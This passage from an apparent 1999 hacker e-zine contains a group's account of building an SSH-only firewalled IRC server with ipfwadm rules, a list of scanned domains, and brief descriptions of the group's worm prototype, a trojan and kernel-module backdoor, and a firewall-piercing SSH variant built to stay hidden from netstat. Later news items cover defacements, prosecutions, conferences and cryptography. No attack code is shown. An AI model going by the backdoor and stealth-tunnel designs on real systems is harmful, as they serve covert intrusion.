configuration combines an unmodified IRC server, SSH, a firewall and a Linux box (or two). There are two possible implementations, one
more secure then the other but also (slightly) more expensive (you'll need another cheap i[345]86 box).
We'll start with our (secure) configuration. We take a cheap Linux box (i486, 8mb RAM, 500mb diskspace, two $15 Ethernet cards), with
the bare minimum Debian installation, remove any "privilege relays" (network services, daemons (crond), suid files) and configure the
kernel _with_ firewall support and _without_ IP forwarding. We then installed the SSH suite, and double check to make sure the *only*
available network service is sshd's port 22 (ICMP / UDP included). As an additional layer of security, we enforce our SSH only policy at
the OS level, by setting up the kernel's IP firewall to reject *all* incoming and outgoing _Internet_ packet traffic by default, except what we
explicitly need to maintain *incoming* SSH sessions.
incoming rules:
default policy: deny
accept TCP packets from any source to thebunker.com port SSH(22)
outgoing rules:
default policy: deny
accept TCP packets from thebunker.com port SSH(22) to any destination
An example implementation (Our ipfwadm(8) bootup configuration):
#!/etc/ipfw/ipfw-setup
# * eth0 interfaces the Internet, and eth1 interfaces the private IRC
# server.
#
# * On 2.2.X kernels and higher the IP firewalling code has been replaced,
# so ipfwadm (and this configuration) will no longer work. ipchains(8)
# should be used instead.
# * Since we are not forwarding between interfaces, 0.0.0.0/0 can be used
# as a safe (portable) alternative to our IP address. Those of you
# who would rather be specific should put their IP here with a mask of 32.
# (For example: 208.212.172.33/32)
ipfwadm -I -f
ipfwadm -I -p deny
ipfwadm -I -a accept -W eth1
ipfwadm -I -a accept -W eth0 -P tcp -D 0.0.0.0/0 22
ipfwadm -O -f
ipfwadm -O -p deny
ipfwadm -O -a accept -W eth1
ipfwadm -O -a accept -W eth0 -P tcp -S 0.0.0.0/0 22
---[ EOF ]---
A simple, airtight firewall. One interface faces the Internet, and the other jacks straight into the safehouse (our IRC server), which should
*not* be capable of accessing the Internet directly and vice versa. The safehouse is a similarly configured bare metal, secure Linux
configuration running _only_ Ircd (_not_ as root!) and sshd. General purpose use of the safehouse is strongly discouraged.
User accounts on the firewall are opened for authorized members of the group, but despite trusting the system's users, access to
administrative account must be strictly limited. This is to insulate the system from the possible security problems of its users, with the
added benefit of protecting a user from coercion (they couldn't compromise security if their life depended on it).
The second configuration may be less secure, depending on your risk model, but is also less expensive. You would only need one Linux
box, and one Ethernet card. We eliminate the "safehouse" and trust the firewall to run the Ircd server safely on loopback (_not_ as root!),
while isolating it from the Internet. In this case, the security of the system _depends_ on correctly enforcing the strict IP firewall filters, and
these are not merely an additional layer of security. Because we are running a service on loopback, the IP firewall must be set up to allow
packets to and from the server on the local interface. While this setup is theoreticly secure "enough", it leaves a larger margin for error
and malice.
In a nostalgic tribute to the old BBS days, "the bunker" features a black and white (green), menu driven default login shell (based on
pdmenu), which greets users with the message of the day, announces events, and offers a consistent customizable UI to local mail,
project forums, IRC (directly into the official, often the only system channel), and an ever growing list of other system activities. ("just one
more feature"!)
The interface started out as a joke, and while it sounds out of date, with the current explosion of graphics, sound and video on the WWW,
it's oddly cozy, and most of us have warmed around to it. (besides, when real work needs to get done, reaching emacs (or a shell) is just
a key-press away)
[item 3] domains scanned
7 three letter domains:
com
- Commercial
net
- Networks
edu
- Educational
mil
- US Military
org
- Organizations
gov
- Government
int
- International Organizations
214 national domains (sorted by size, left right, top down):
jp (Japan) us (United States)
uk (United Kingdom) de (Germany)
ca (Canada) au (Australia)
nl (Netherlands) fi (Finland)
fr (France) se (Sweden)
it (Italy) no (Norway)
tw (Taiwan, Province Of China) dk (Denmark)
es (Spain) ch (Switzerland)
br (Brazil) kr (Korea, Republic)
be (Belgium) ru (Russian Federation)
za (South Africa) at (Austria)
nz (New Zealand) mx (Mexico)
pl (Poland) il (Israel)
hu (Hungary) hk (Hong Kong)
cz (Czech Republic) sg (Singapore)
ar (Argentina) ie (Ireland)
gr (Greece) pt (Portugal)
my (Malaysia) tr (Turkey)
cl (Chile) ee (Estonia)
is (Iceland) th (Thailand)
su (Soviet Union) sk (Slovakia, Slovak Republic)
ae (United Arab Emirates) si (Slovenia)
cn (China) ro (Romania)
co (Colombia) ua (Ukraine)
id (Indonesia) uy (Uruguay)
in (India) lv (Latvia)
lt (Lithuania) ph (Philippines)
ve (Venezuela) bg (Bulgaria)
hr (Croatia 'Hrvatska') yu (Yugoslavia)
lu (Luxembourg) kw (Kuwait)
do (Dominican Republic) pe (Peru)
cy (Cyprus) nu (Niue)
cr (Costa Rica) pk (Pakistan)
na (Namibia) lb (Lebanon)
tt (Trinidad And Tobago) eg (Egypt)
kg (Kyrgyzstan) to (Tonga)
gl (Greenland) pr (Puerto Rico)
ec (Ecuador) kz (Kazakhstan)
bm (Bermuda) bn (Brunei Darussalam)
py (Paraguay) zw (Zimbabwe)
mt (Malta) gt (Guatemala)
sv (El Salvador) cc (Cocos 'Keeling' Islands)
cx (Christmas Island) pa (Panama)
by (Belarus) ni (Nicaragua)
ge (Georgia) ke (Kenya)
om (Oman) bw (Botswana)
bo (Bolivia) fo (Faroe Islands)
bh (Bahrain) mu (Mauritius)
ma (Morocco) lk (Sri Lanka)
ad (Andorra) mk (Macedonia, Former Yugoslav)
md (Moldova, Republic) bs (Bahamas)
vi (Virgin Islands, US) ng (Nigeria)
am (Armenia) ba (Bosnia And Herzegowina)
jo (Jordan) ky (Cayman Islands)
li (Liechtenstein) jm (Jamaica)
sa (Saudi Arabia) gi (Gibraltar)
zm (Zambia) pf (French Polynesia)
sz (Swaziland) tm (Turkmenistan)
bz (Belize) mc (Monaco)
ir (Iran, Islamic Republic) ci (Cote D'Ivoire)
uz (Uzbekistan) sm (San Marino)
ai (Anguilla) fj (Fiji)
sn (Senegal) gh (Ghana)
bf (Burkina Faso) ag (Antigua And Barbuda)
fm (Micronesia, Federated States) az (Azerbaijan)
gp (Guadeloupe) np (Nepal)
dm (Dominica) mo (Macau)
mz (Mozambique) tz (Tanzania, United Republic)
pg (Papua New Guinea) st (Sao Tome And Principe)
ug (Uganda) nc (New Caledonia)
gf (French Guiana) tg (Togo)
mv (Maldives) gu (Guam)
al (Albania) hn (Honduras)
im (Isle of Man) aw (Aruba)
cu (Cuba) vu (Vanuatu)
tc (Turks And Caicos Islands) et (Ethiopia)
tj (Tajikistan) hm (Heard And Mc Donald Islands)
gy (Guyana) tn (Tunisia)
mg (Madagascar) kh (Cambodia)
ac (Ascension Island) as (American Samoa)
nf (Norfolk Island) aq (Antarctica)
io (British Indian Ocean Territory) ck (Cook Islands)
bb (Barbados) gb (United Kingdom)
je (Jersey) mq (Martinique)
sh (St. Helena) bt (Bhutan)
vn (Viet Nam) ms (Montserrat)
lc (Saint Lucia) dz (Algeria)
vg (Virgin Islands, British) ye (Yemen)
sb (Solomon Islands) mn (Mongolia)
ls (Lesotho) gg (Guernsey)
ne (Niger) mr (Mauritania)
mp (Northern Mariana Islands) gw (Guinea-Bissau)
sl (Sierra Leone) qa (Qatar)
tf (French Southern Territories) bj (Benin)
va (Vatican City State) cd (Congo, Democratic Republic)
an (Netherlands Antilles) km (Comoros)
sc (Seychelles) gs (South Sandwich Islands)
kn (Saint Kitts And Nevis) ly (Libyan Arab Jamahiriya)
pn (Pitcairn) gd (Grenada)
cm (Cameroon) tp (East Timor)
mh (Marshall Islands) ws (Samoa)
um (United States Minor Outlying Islands) tv (Tuvalu)
sy (Syrian Arab Republic) re (Reunion)
pw (Palau) mw (Malawi)
mm (Myanmar) ml (Mali)
lr (Liberia) cv (Cape Verde)
cg (Congo, Republic) af (Afghanistan)
[item 4] Lukemia
One of our first research projects (circa 1997) involved researching possible designs of a modern network worm. We even developed a
prototype in C which implements some of our ideas.
Today, we're pretty horrified by our choice of language (In C, everything is equally difficult, "help save the world!" -- use Perl) and the
quality of the code (butt ugly).
[item 5] Portacelo
"Local security subversion. Why human and (current) software (tripwire and others) host-based Intrusion Detection Systems are a bad
idea."
We did some research (right after the IAP was over) in this subject, and plan to release an article sometime in the near future.
A fully-featured backdoor implementation is available, demonstrating the concept, which combines SSH ESP (suffix item 6), a kernel
module, direct memory manipulation, and a good old fashioned binary trojan.
[item 6] SSH ESP
A hacked SSH suite modified to implement ESP (Encapsulated encrypted STREAMS Protocol) at the application level.
Notable features include:
piercing almost any current filter firewall. (ab-uses any available packet traffic: tcp, udp and icmp)
invisible at the operating system level. (netstat and friends will not register any activity)
practical. (ESP is almost as fast and reliable as TCP, including error correction)
military strength encryption. (thanks to SSH)
[iem 7] Note to the reader
Christ, it took me, Liraz, over 2 weeks to write this silly article, during which I had to drop whatever I was doing, and devote the bulk of my
time to writing this memorandum of the IAP in English, which is not my native language.
(Disclaimer: Please excuse any errors in syntax, grammar or spelling. That felt good. Please forgive my bad writing, untasteful dramatics,
poor sense of humor... I'll stop now...)
In the process I had to convince my fellow project associates (some of them very strong willed) that documenting the IAP was A Good
Thing, at least for posterity's sake...
And all so I could offer you, dear reader, a chance to share some of my humble insights on computer security, and a taste of hacker
culture. This is my first publication, I'm not too sure on how this is going to be accepted. Frankly, I prefer writing code, so I'm not sure I'll
be writing any more articles soon. Whether or not that happens depends on the response I get from interested readers.
If there is a good response, there will be more. But goddammit, they'll be shorter this time!
I hope the article wasn't too technical for your tastes, but the project was mostly about overcoming technical and logistical difficulties, so
that was hard to escape.
Also, I am very short on time and resources, so if anyone is interested in sponsoring the material (an official SSR website for the rant and
the software), that would be great.
Oh, any takers on the IDDN front? We can start out with a (preferably archived) mailing list, find some interested people, get the ball
rolling...
All points of contact: liraz@bigfoot.com
@HWA
32.0 TCS Web Page Defacer Pleads Guilty
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by Dioxin
A 15-year old has pleaded guilty to defacing the web
page of two Television Corporation of Singapore (TCS)
web sites. The defacement occurred back in June. The
infocrimminal will be sentenced soon for four counts of
unauthorized entry and the disclosure of passwords.
The individual made several guess at the login/password
and eventually hit upon a combination that worked,
"news/news". (And no sanctions against TCS for having
weak/no security)
The Strait Times
http://straitstimes.asia1.com.sg/cyb/cyb1_0813.html
HNN Archive for June 18
http://www.hackernews.com/arch.html?061899#4
(Strait Times article provided a 404)
@HWA
33.0 Cybercrime On the Rise in Russia - First Offender Convicted
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by Lionel
The Russian Home Office has detected more than 100 IT
related offenses since the beginning of the year. Russia
has convicted its first computer related offender, an 18
year old student who stole $11,000 from a US company
by selling its products over the Internet has been
sentenced to 5 months in jail.
S Yahoo - French
http://www.yahoo.fr/actualite/19990812/multimedia/934457760-yaho140.120899.133648.html
jeudi 12 ao�t 1999, 13h36
Pr�s de 100 d�lits informatiques d�tect�s en Russie en 7 mois
MOSCOU, 12 ao�t (AFP)- Le minist�re russe de l'Int�rieur a d�tect� pr�s de 100 cas de fraude
informatique depuis le d�but de l'ann�e, a rapport� jeudi l'agence Itar-Tass.
"La Russie a d� commencer � r�soudre ce probl�me apr�s des effractions des syst�mes informatiques
� l'�tranger faites depuis la Russie", a comment� Vladislav Selivanov, chef du d�partement de la
lutte contre la fraude informatique, cr�� il y a un an.
La fraude informatique sous toutes ses formes a augment� ces derniers temps en Russie en raison de
la crise �conomique, selon le directeur de la compagnie Aladdin qui produit des syst�mes de d�fense
pour les logiciels, Sergue� Grouzdev.
"Les pertes que nous avons d�couvertes ces derniers temps repr�sentent plusieurs centaines de
dollars par jour, mais les chiffres r�els sont beaucoup plus consid�rables", a-t-il estim�.
La premi�re condamnation en Russie d'un pirate informatique a eu lieu en novembre � Moscou : un
�tudiant russe de 18 ans qui avait escroqu� 11.000 dollars � une soci�t� am�ricaine vendant ses
produits sur l'internet a �t� condamn� � 5 ans de prison avec sursis.
neo/fd t
@HWA
34.0 ToorCon Less Than One Month Away
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by skalore
The first annual ToorCon is set to take place in less
then one month, on September 3rd-4th, at the Price
Center in The University of California, San Diego.
ToorCon is San Diego's only comprehensive computer
security conference, and will feature lectures that range
from topics such as; IDS, Stack-based buffer overflows,
secure remote communications, and more. ToorCon will
also feature staff members from Attrition.org and
ToorCon will reporters from the San Diego Union Tribune.
And of course, after the day's lectures, San Diego's
friendly neighbor to the south, Mexico, is available 24
hours, for partying and fun.
HNN Cons page
http://www.hackernews.com/cons/cons.html
@HWA
35.0 FRESHMEAT.NET BOUGHT
~~~~~~~~~~~~~~~~~~~~
From http://www.net-security.org/
by BHZ, Saturday 14th August 1999 on 9:51 pm CET
It looks like Linux related sites are interesting for acquisition. After buying of Slashdot
web site (www.slashdot.org), Andover.net bought well known FreshMeat
(www.freshmeat.net). Plans for this site are the same as for Slashdot - Andover.net
will earn money from selling advertising space.
@HWA
36.0 LINUXPPC CRACK-CONTEST FINISHED
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From http://www.net-security.org/
by Thejian, Saturday 14th August 1999 on 8:20 pm CET
The LinuxPPC crack-the-box contest has come to an early end, no-one has made a
successful attempt yet, but some the organization of the contest decided to stop it
for the following reasons: "Although it is interesting to have all of you try to break into
the machine here, there are some problems that we found with that method. 1) Waste
of bandwidth, 2) Waste of usefull machine that is supposed to go to AbiSource, 3)
People are not following the rules anymore: Instead of breaking into our machine,
they have started to piss of the ISP and other customers because they are trying to
break into other machines. Please note,: This is an illegal activity and out of our
hands. If you are doing this and continue to, the normal process of prosecuting such
action will occur. 4) Because so many people are trying, interesting attacks are
difficult to perform."
@HWA
37.0 INFOSEEK HACKED
~~~~~~~~~~~~~~~
From http://www.net-security.org/
by BHZ, Saturday 14th August 1999 on 5:52 pm CET
Today Infoseek (infoseek.go.com) was hacked. As Attrition collects defaced mirrors
for archiving they noticed on this hack: "infoseek.go.com received an interesting hack
of sorts. Attempting to search for anything would potentially yield a defaced page.
The person reporting the hack to the Attrition staff received it after 5 searches. We
tested it and received the defaced page on the first search attempt. This page stands
out in comparison with their normal pages". Mirror of the defacement
here:http://www.attrition.org/mirror/attrition/com/infoseek.go.com/Titles.html
@HWA
38.0 HACKERS, IT CONSULTANTS EMBRACE FREE SECURITY TOOL
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From http://www.net-security.org/
by Thejian, Saturday 14th August 1999 on 6:00 am CET
FreeS/Wan is an open-source software package for Linux based servers that uses
strong encryption to create secure data tunnels between any two points on the
internet. It uses the IPsec protocol, an interoperable global standard for securing IP
connections. The software generated strong interest among the 1,800 hackers who
attended the Chaos Communication Camp, the Chaos Computer Club's first
international hacker conference held outside Berlin last weekend. Here are some
opinions on it.
@HWA
39.0 TRINUX 0.62 RELEASED
~~~~~~~~~~~~~~~~~~~~
From http://www.net-security.org/
by Thejian, Saturday 14th August 1999 on 5:40 am CET
Trinux is a portable Linux distribution that boots from 2-3 floppies (or a FAT 16
partition) and runs entirely in RAM. Trinux contains the latest versions of popular
network security tools and is useful for mapping and monitoring TCP/IP networks.
Trinux transforms an ordinary x86 PC into a powerful network (security) management
workstation without modifying the underlying hardware or operating system. Get it.
here: http://www.trinux.org
@HWA
40.0 GOVERNMENT FACES SECURITY SKILLS SHORTAGE
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From http://www.net-security.org/
by Thejian, Saturday 14th August 1999 on 5:20 am CET
The US federal government is facing a tremendous shortage of people needed to fight
future cyberwars. Over the next seven years, the government will have to replace
more than 32,000 information technology workers -- almost half of the 71,000 IT
workers employed by federal agencies, according to a recent study by the federal
Chief Information Officers Council. Of most concern is the need for IT employees with
information security skills, according to a recent federal report urging the creation of a
massive intrusion-detection system to protect federal and critical private systems,
such as energy, telecommunications and transportation, against cyberattack.
Computerworld.
(Online News, 08/12/99 05:34 PM)
Government faces security skills
shortage
By Patrick Thibodeau
WASHINGTON -- Federal officials are looking at ways to
prevent an "electronic Pearl Harbor" -- a sneak cyberattack.
But in a situation somewhat parallel to the plight of the
undermanned and unprepared military in 1941, the federal
government is facing a tremendous shortage of people
needed to fight any future cyberwar.
Over the next seven years, the government will have to
replace more than 32,000 information technology workers --
almost half of the 71,000 IT workers employed by federal
agencies, according to a recent study by the federal Chief
Information Officers Council. Much of the turnover is the
result of rise in the number of employees eligible for
retirement.
Of most concern is the need for IT employees with
information security skills, according to a recent federal
report urging the creation of a massive intrusion-detection
system to protect federal and critical private systems, such
as energy, telecommunications and transportation, against
cyberattack.
The national cyber protection plan recommends funding
information security programs at universities and offering
scholarships to students in exchange for a commitment to
work at federal agencies. Such programs may ultimately
benefit private companies.
Only a handful of universities now offer programs in
information security. "Security hasn't made it into the
mainstream of academe," said Lance J. Hoffman, a
professor of computer science at George Washington
University in Washington.
So most IT students study to become programmers or
Windows NT experts, while security specialist tend to get
their training on the job, said Paul Jansen, manager of
information security at loan guarantor and administration
company USA Group Inc. in Indianapolis. When he hires,
"I'm hiring other companies' security people," he said.
If more universities offer security training, "I'm going to get
people who have a better understanding of what our
profession is all about," Jansen said.
Throughout the industry, companies are having a tough time
hiring IT workers with security skills. "I consider the need
dire," said Richard Power, editorial director at the Computer
Security Institute in San Francisco.
Salary issues, in particular, make it hard for federal
agencies to compete with the private sector. Government IT
workers often start at salaries of less than $25,000, and the
federal security plan recommends improving pay.
There is "fierce competition" for IT workers with security
skills, said Timothy Grance, manager of systems and
network security at the National Institute of Standards and
Technology. But a pay-for-performance salary program and
the promise of working on research projects have been
hiring incentives, he said.
@HWA
41.0 SOFTWARE REVERSE ENGINEERING ALLOWED IN AUSTRALIA
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From http://www.net-security.org/
by Thejian, Saturday 14th August 1999 on 5:00 am CET
A passage of the Copyright Amendment (Computer Programs) Bill 1999, a legislation
passed yesterday, will allow software engineers to decompile computer software in
limited circumstances to develop interoperable products. Read more below.
Consumers and computer industry benefit from copyright changes
Senator the Hon Richard Alston
Minister for Communications, the Information
Economy and the Arts
The Hon Daryl Williams AM QC
Attorney-General
JOINT NEWS RELEASE
13 August 1999
Consumers will have greater choice in computer software and Australian-developed software will be more internationally
competitive as a result of new legislation passed yesterday.
The Attorney-General, the Hon Daryl Williams AM QC MP and Senator the Hon Richard Alston, Minister for Communications,
Information Technology and the Arts announced today that passage of the Copyright Amendment (Computer Programs) Bill 1999
will allow software engineers to decompile computer software in limited circumstances so they can develop interoperable
products.
Currently software copyright owners can block this type of decompilation as an infringement of copyright.
New laws mean developers will be able to decompile software to find this vital interface information if it is not readily available.
Overseas developers have been able to do this for some time, particularly in Europe and the United States of America where
Australia's main competitors in this sector are located.
The amendments to the Copyright Act confirm that the Australian Government is committed to creating an environment that is
conducive to increasing the competitiveness of Australian business and providing choice for consumers.
The legislation also recognises that Australia's information industries underpin competitiveness of other industry sectors,
particularly in the global economy.
The legislation also makes changes to the Copyright Act important for the development of the information economy in Australia.
The information age brings with it new threats to our safety and security - such as computer viruses and increasing incidence of
unauthorised access to valuable information stored digitally.
The legislation will help companies protect their valuable digital assets by providing another tool with which to deal with these
threats.
In recognition of the importance of resolving the year 2000 computer date (Y2K) problem, the legislation will operate
retrospectively for error correction to the date of the announcement of the Government's decision, 23 February 1999.
Decompilation of a program will be allowed without the copyright owner's permission for interoperability or security testing only if
the information on the program's interfaces or on ensuring system security is not readily available.
Information derived from decompilation of a program about its interfaces with other software or about errors in a defective copy,
including Y2K problems, or which is required for testing system security cannot be used or communicated to others for any other
purpose, without the copyright owner's permission.
The severe penalties for copyright piracy will continue to apply. These penalties comprise up to $60,500 and / or five years in
prison for each offence by an individual and up to $302,500 for each offence by a corporation.
Media Contacts:
Nicholas Harford
Mr Williams' office (02) 6277 7300
Terry O'Connor
Senator Alston's office (02) 6277 7480
@HWA
42.0 IRELAND INTENDS TO CRIMINALIZE E-SIGNATURE FRAUD
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From http://www.net-security.org/
by Thejian, Saturday 14th August 1999 on 4:50 am CET
In a bid to bolster e-commerce security, the Irish government has introduced
legislation that would criminalize the fraudulent use of e-signatures, subjecting
violators to possible imprisonment and fines in excess of US$100,000. Under the
extensive proposed legislation, e-signature documents and contracts will be afforded
the same legal status as their paper counterparts. Info on 32bitsOnline.
http://www.32bitsonline.com/news.php3?news=news/199908/nb199908135&page=1
Ireland Intends To Criminalize E-Signature Fraud
By: David McGuire
Date: 08/13/99
Location: WASHINGTON, DC, U.S.A.,
In a bid to bolster e-commerce security, the Irish government has introduced legislation that would criminalize
the fraudulent use of e-signatures, subjecting violators to possible imprisonment and fines in excess of
US$100,000.
"The (European Union) is expected to come out with an e-signature directive and we've beat them (to it) with
our own," Ken Thompson, spokesperson for the Irish embassy in Washington, DC, told Newsbytes today.
Under the extensive proposed legislation, "e-signature documents and contracts will be afforded the same
legal status as their paper counterparts," Thompson said.
The ultimate goal of the legislation, which is expected to be passed into law before Christmas, is to heighten
e-commerce security using the "lightest regulatory touch" possible, Thompson said.
The legislation was proposed by Ireland's Department of Public Enterprise and should encounter no significant
obstacles in becoming law, Thompson said.
Under Irish parliamentary structure, bills that enjoy the support of the majority party are essentially assured of
passage.
Full text of the proposed legislation is located online at http://www.ecommercegov.ie/ .
Earlier this month, the US House of Representatives' Committee on Commerce approved by unanimous voice
vote the Electronic Signatures in Global and National (E-SIGN) Commerce Act, H.R. 1714.
H.R. 1714 would legalize the use of digital signatures, making them as legally binding as a hand-signed John
Hancock. The bill also establishes federal rules for digital signatures, replacing a patchwork of different state
regulations.
@HWA
43.0 ISRAEL AND PIRACY
~~~~~~~~~~~~~~~~~
From http://www.net-security.org/
by Thejian, Saturday 14th August 1999 on 4:00 am CET
The whole of Israel shares the same disk goes the joke. But Israels almost getting
placed on the Office of the United States Trade Representative's infamous Priority
Foreign Country List for its alleged illegal activities is no laughing matter. According
to the annual global report jointly prepared by the Software and Information Industries
Association (SIIA) and the Business Software Alliance (BSA), 48 percent of software
used in 1998 in Israel was illegal and this has to change. Wired.
Piracy Rampant in Israel
by By Tania Hershman
3:00 a.m. 13.Aug.99.PDT
JERUSELEM -- When is a Microsoft Intellimouse not a Microsoft Intellimouse? When it's one of the several thousands of fake mice recently seized by
police from an Israeli warehouse.
The whole of Israel -- government included -- is sharing one disk, goes the joke. But for manufacturers big and small, Israelis' predilection for
piracy, of software and music as well as hardware, is no laughing matter.
Israel is dangerously close to being placed on the Office of the United States Trade Representative's infamous Priority Foreign Country List for its
alleged illegal activities.
New Justice Minister Yossi Beilin, visiting the United States this week, announced that he will be trying to appease the powers-that-be in order to
avoid the next step -- sanctions.
According to the annual global report jointly prepared by the Software and Information Industries Association (SIIA) and the Business Software
Alliance (BSA), 48 percent of software used in 1998 in Israel was illegal, which represents lost revenues of US$63 million.
While Israel does not top the list -- in Russia, for example, the figure is closer to 90 percent -- the United States is particularly upset with Israel
because the government appears to be doing nothing.
There may be a reason for this. "The government is one of the biggest of the software industry's customers, and they are using illegal software,"
says Ami Fleischer, Israel's representative to the BSA.
"But when we say illegal software, this doesn't mean that there is a government official going down to the flea market," he added.
The situation is euphemistically called 'under-licensing' or 'overworking,' meaning the number of licenses falls below the number of copies being used.
On a wider scale, the Israeli public is not averse to "borrowing" software, believing that the chances of being caught are slim to none. "Bill Gates
can afford it, right?" laughed one offender.
Microsoft is not the only target: Other, smaller software houses with all their hopes riding on one product are being hit much harder.
This culture of acceptable piracy may be rooted in the bootleg Hebrew music trade. At the central bus station in Tel Aviv, illegal cassettes and CDs
of Israel's top artists are hawked openly.
The damage done to this small local industry has been sufficient to warrant a national ad campaign featuring gagged Israeli singers.
Israeli piracy is not limited to Israel's borders. Illegal copies are making their way abroad, too. "The figure of 48 percent doesn't show the whole
picture. That doesn't get into the export issue. Forty-eight percent is a low estimate," said Keith Kupferschmidt, the SIIA's intellectual property
counsel in Washington.
Kupferschmidt has a word of advice for new prime minister Ehud Barak. "Whenever there is a high piracy rate there is a problem with people's
understanding of what it is acceptable to do," he said. "If you have people in government whose job it is to crack down on piracy and the
government devotes resources, we would see a different attitude."
New legislation is in the works to modernize a copyright law dating back to 1911. According to Sandra Azancot, legal advisor on intellectual
property law at Israel's Ministry of Justice, "The new legislation is a much more modern law, with a lot of clarification and strengthening."
For example, the punishment for criminal offenses will now be five years instead of three.
During his US visit this week, Justice Minister Beilin is talking up this legislation, as well as the new antipiracy police unit set up a few months ago.
He will also be pointing to the fact that only three years ago 75 percent of software in Israel was illegal, over 50% higher than today.
Yes, big organizations have smartened up their act, said the BSA's Ami Fleischer, but among small businesses with smaller pockets -- half of the
Israeli business sector -- piracy is at the 80 percent mark. "People must understand that paying for software is part of the financial costs [of the
company]," he stresses.
With its thousands of high-tech start-ups Israel likes to think of itself as another Silicon Valley. But this won't last long if it allows potential
technological and business allies to be ripped off.
The Office of the US Trade Representative, which normally surveys the situation every April, is holding an extraordinary review in December of the
Israeli government's progress. If it is not impressed, Israel will have six months to comply with certain conditions, says Fleischer, "and then the
federal government will be obliged to impose sanctions."
@HWA
44.0 OUTSIDE HELP ISN'T WANTED
~~~~~~~~~~~~~~~~~~~~~~~~~
From http://www.net-security.org/
by BHZ, Saturday 12th August 1999 on 3:58 pm CET
Retired Cobol programmers will not be needed to help in building Y2K prepared
systems. Vice president of communications at the Information Technology
Association of America said: "We've seen many companies do much more work on
this issue with internal staff than [was] originally thought earlier on". If you are
wondering why Cobol programmers are important to solving Y2K bug go here.
http://default.net-security.org/1/03.htm
@HWA
45.0 HACKER MYTHOLOGY
~~~~~~~~~~~~~~~~
From http://www.net-security.org/
by BHZ, Saturday 12th August 1999 on 3:51 pm CET
ZDNet did a piece from this years' WebSec security conference. "The image of the
hacker as a romantic, dangerous figure is pervasive, even in high-tech industries.
Vendors promote such an image to sell security products. Hackers and wannabes
promote it for the mystique".
(Article not found - Ed)
@HWA
46.0 DEFAULT ISSUE #1
~~~~~~~~~~~~~~~~
From http://www.net-security.org/
by BHZ, Friday 13th August 1999 on 7:01 pm CET
We are proud to announce that Default - Help Net Security newsletter is available to
our readers. First issue covers: Last week's news on Help Net Security, Y2K: As the
millennium approaches, A look into basic cryptography, The history of Zero
Knowledge Systems, Telecommunications 101, Macintosh security: How to make
your mac a babel tower, Computing: A closer look at hard- and software, An
approach to Linux System Security, Infection & Vaccination, Spam: The problems
with junk e-mail, Freedom of speech - related incidents, Meet the underground and a
Guest column. So go to Default web-site (http://default.net-security.org) and start
reading :)
@HWA
47.0 MICROSOFT AND AOL
~~~~~~~~~~~~~~~~~
From http://www.net-security.org/
by BHZ, Friday 13th August 1999 on 6:57 pm CET
Microsoft employee impersonated a private technology consultant and sent an e-mail
accusing AOL of irresponsible behavior in the battle over instant messaging. Microsoft
officials didn't comment on it yet, but Richard Smith, security expert who received
this e-mail said that Microsoft confirmed that the e-mail came from their employee.
Contributed by ZaP.
@HWA
48.0 INTERVIEW WITH ERIC RAYMOND
~~~~~~~~~~~~~~~~~~~~~~~~~~~
From http://www.net-security.org/
by BHZ, Friday 13th August 1999 on 6:45 pm CET
ZDNet has published an interview with Eric Raymond, a programmer who supports
open source movement which gave birth to the Linux operating system. He describes
himself as "an anthropologist of the loosely knit community of developers who, on
their own, have tinkered away at the increasingly popular alternative OS". Read the
interview with Raymond (url not found)
@HWA
49.0 CODE-CRACKING COMPUTER CAUSES CONCERN
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From http://www.net-security.org/
by Thejian, Friday 13th August 1999 on 2:00 am CET
Adi Shamir, one of the developers of the RSA encryption method, says he has
designed a computer that could crack open a file encoded using RSA in only a few
days. Needless to say, with RSA being one of the most widespread used encryption
methods, such a computer could jeopardize the privacy of the bulk of electronic
commerce as practiced today. Full story.
Code-cracking computer causes concern
WORCESTER, Mass. (AP) -- A developer of one of the most widespread
computer encryption systems said Thursday he has designed a computer
that could crack open a file encoded using the most common form of data
encryption in only a few days.
If built -- at an estimated cost of about $2 million -- such a computer could
jeopardize the privacy of the bulk of electronic commerce as practiced
today, according to cryptographers at the conference where the design was
shown.
Most highly sensitive military, banking and other data are protected by
stronger encryption keys beyond its reach. The commonly used weaker
keys, though, would become ''easy to break for large organizations,'' said
cryptographer Adi Shamir of the Weizmann Institute of Science in Rehovot,
Israel.
He developed both the new computer design and helped invent the
widespread coding system -- known as RSA public-key encryption -- that it
cracks.
Shamir spoke at the opening of a two-day conference of more than 120
cryptography experts from around the world at Worcester Polytechnic
Institute.
Computer scientists said his work underscores the growing vulnerability of
the most commonly used short form of RSA keys, which consists of just 512
bits. The key -- a sequence of 1s and 0s, or bits -- unlocks the secret coding
of a computer transmission so it can be deciphered.
Shamir dubs his idea for the computer Twinkle, which stands for The
Weizmann Institute Key Locating Engine, and also refers to the twinkle of
its light-emitting diodes. The 6-by-6-inch optical computer would measure
the light from diodes to perform mathematical calculations solving 512-bit
RSA encryption keys faster than ever -- within two or three days. An effort
in February to solve shorter, easier 465-bit keys took hundreds of computers
and several months.
Shamir first informally showed a prototype of his device at a conference in
Prague, the Czech Republic, in May. He publicly outlined its workings at
length for the first time Thursday.
''Twinkle is a little out there, but it looks like it's buildable to me,'' said Seth
Goldstein, an expert in computer architecture at Pittsburgh's Carnegie
Mellon University.
Organized crime, friendly and unfriendly governments, research institutions
and others might take an interest in such a project, conference participants
suggested.
In any event, users of 512-bit keys ''should be worried,'' said Christof Paar,
a computer engineer at Worcester Polytechnic Institute.
''In the current state of the art, it is not secure,'' added Bob Silverman, a
research scientist at Bedford, Mass.-based RSA Laboratories, a division of
RSA Data Security, which Shamir co-founded but where he no longer
works.
Longer keys, such as 1,024-bit, are already employed for many sensitive
communications. But, out of intelligence and other concerns, the U.S.
government requires special permission to export software with the longer
keys. The most popular browsers are normally set to just 512 bits.
Brian Snow, a technical director for information security at the National
